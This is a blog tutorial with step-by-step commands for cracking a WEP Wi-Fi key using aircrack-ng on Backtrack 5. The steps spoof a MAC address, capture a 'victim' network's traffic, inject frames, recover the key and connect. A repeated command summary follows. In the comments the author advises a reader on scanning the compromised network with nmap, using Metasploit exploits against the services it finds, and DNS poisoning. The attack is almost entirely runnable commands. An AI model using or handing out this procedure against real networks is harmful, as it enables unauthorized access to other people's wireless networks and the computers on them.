Wireless – aircrack-ng wep

Wireless wep authentication key crack using Backtrack 5R1

1. Disable monitor mode on the wireless interface.
2. Disable the wireless interface.
3. Spoof your mac-address.
4. Restart monitor mode and the wireless interface.

root@bt:~# airmon-ng stop (interface)
root@bt:~# ifconfig (interface) down
root@bt:~# macchanger --mac 00:11:22:33:44:55 (interface)
root@bt:~# airmon-ng start (interface)

5. Start Airodump-ng To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlite and copy the full line that you want to crack.

Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng.

root@bt:~# airodump-ng (interface)

6. From the copied line from stage 5, type in the channel, add a file name ie wep, paste the bssid in (bssid is the victims mac-address) and add your interface

root@bt:~# airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Example airodump-ng -c 6 -w /root/WEP/wepdump --bssid 00:01:04:06:01:02 wlan0

7. Open another terminal window and start aireplay-ng. Aireplay-ng is used to inject frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP

The ESSID is the access point’s SSID name. After pressing enter you should see “Association successful” message with that smiley face.

root@bt:~# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

8. Create more traffic to help gain the keys faster

root@bt:~#Β  aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

9. Now you should be collecting data that contains the key. This can take a long time. Open the 1st terminal Window and look at the column called “#Data” This needs to go above 10,000. This should give you enougth data to be able to crack the key.

Once you reach 10000+

root@bt:~#Β  aircrack-ng -b (bssid) (file name-01.cap)

Example aircrack-ng -b 00:01:04:06:01:02 /root/WEP/wepdump.cap

10. The Key!

KEY FOUND! [ A7:24:47:AB:C4:47:C2:14:EE:78:14:54:BB ]

11. To connect stop all running wep crack programs then stop monitor mode on the wireless.

root@bt:~# airmon-ng stop (interface)
root@bt:~# ifconfig (interface) down
root@bt:~# ifconfig (interface) up

12. Open Wicd Network Manager – Applications / Internet / Wicd Network Manager – Find the SSID for the cracked wep key.
Properties / Pull down on the encryption settings and choose WEP Shared/Restricted and add the found key as below.


OK – Properties will close – Click Connect.


airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

airodump-ng (interface)

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)

3 thoughts on “Wireless – aircrack-ng wep

  1. a question: say you’ve cracked the victim’s wireless pwd, can you infiltrate the victim’s computer from there onwards? if possible, how do you go about in doing it? thanks dude your a genius!

    1. Hi Gabriel, Thanks for the comment. In a lab environment once the wep pwd is gained and you have connected you could scan this network with nmap

      root@bt:~/tor# nmap -sC -sT -v --open
      This will show you all hosts and open services then look at each open port and find an exploit for this service. Metasploit should have one or two?

      Another long winded way would be to poison dns http://vishnuvalentino.com/hacking-tutorial/social-engineering-tabnabbing-attack-ettercap-local-dns-poisoning/

      Thanks for the support hope you enjoy the site.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s